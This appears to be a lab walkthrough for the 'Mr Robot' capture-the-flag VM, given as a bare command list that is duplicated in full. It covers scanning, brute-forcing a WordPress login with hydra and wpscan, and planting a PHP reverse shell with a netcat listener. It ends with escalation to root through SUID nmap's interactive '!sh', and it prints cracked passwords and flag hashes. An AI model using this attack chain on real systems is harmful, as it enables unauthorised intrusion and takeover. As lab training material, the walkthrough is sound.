VM 4 - MR Robot
============ steps to follow ======================
netdiscover -r 192.168.239.133/24
nmap -sS -AT4 192.168.239.133 /OS and apps
nmap -sS -O -A -n 192.168.239.133
nikto -host 192.168.239.133 / Find apache details
enum4linux 192.168.239.133 / get more details
dirb http://192.168.239.133 / search the web server
192.168.239.133/robots.txt
got a dictionary
wc -l fsociety.dic /Dictionary count 858160 fsocity.dic
cat fsociety.dic | sort -u | wc -l
cat fsocity.dic | sort -u | uniq > newfsocity.dic / make a unique directory
--------------------------------------------------
bruteforce the wp-login.php using that wordlist |
--------------------------------------------------
hydra -L newfsocity.dic -p whocares 192.168.239.133 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:invalid"
/ -p for password (anything can be given)
wpscan --url http://192.168.239.133/ --wordlist /root/Desktop/Pentest/newfsocity.dic --username Elliot
password: ER28-0652
Download the shell and upload it to wordpress plugin
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
nc -v -n -l -p 4444 / in terminal
cd /home
c3fcd3d76192e4007dfb496cca67e13b --> md5 hash
abcdefghijklmnopqrstuvwxyz --> decrypted
python -c 'import pty; pty.spawn("/bin/bash")'
su robot
abcdefghijklmnopqrstuvwxyz
cd /home
cd /robot
key-2-of-3.txt -- >822c73956184f694993bede3eb39f959
ls -alh / shows all privilages
find / -name key-3-of-3.txt /find a file; permission denbued''
find / -perm -4000 -type f 2>/dev/null
found: /usr/local/bin/nmap --> this requires root access to work..
nmap --help
nmap --interactive
!sh /get get shell access by typing "!" in nmap interactive session
whoami /root
cd root
ls
key-3-of-3.txt
cat key-3-of-3.txt
============ steps to follow ======================
netdiscover -r 192.168.239.133/24
nmap -sS -AT4 192.168.239.133 /OS and apps
nmap -sS -O -A -n 192.168.239.133
nikto -host 192.168.239.133 / Find apache details
enum4linux 192.168.239.133 / get more details
dirb http://192.168.239.133 / search the web server
192.168.239.133/robots.txt
got a dictionary
wc -l fsociety.dic /Dictionary count 858160 fsocity.dic
cat fsociety.dic | sort -u | wc -l
cat fsocity.dic | sort -u | uniq > newfsocity.dic / make a unique directory
--------------------------------------------------
bruteforce the wp-login.php using that wordlist |
--------------------------------------------------
hydra -L newfsocity.dic -p whocares 192.168.239.133 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:invalid"
/ -p for password (anything can be given)
wpscan --url http://192.168.239.133/ --wordlist /root/Desktop/Pentest/newfsocity.dic --username Elliot
password: ER28-0652
Download the shell and upload it to wordpress plugin
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
nc -v -n -l -p 4444 / in terminal
cd /home
c3fcd3d76192e4007dfb496cca67e13b --> md5 hash
abcdefghijklmnopqrstuvwxyz --> decrypted
python -c 'import pty; pty.spawn("/bin/bash")'
su robot
abcdefghijklmnopqrstuvwxyz
cd /home
cd /robot
key-2-of-3.txt -- >822c73956184f694993bede3eb39f959
ls -alh / shows all privilages
find / -name key-3-of-3.txt /find a file; permission denbued''
find / -perm -4000 -type f 2>/dev/null
found: /usr/local/bin/nmap --> this requires root access to work..
nmap --help
nmap --interactive
!sh /get get shell access by typing "!" in nmap interactive session
whoami /root
cd root
ls
key-3-of-3.txt
cat key-3-of-3.txt
Comments
Post a Comment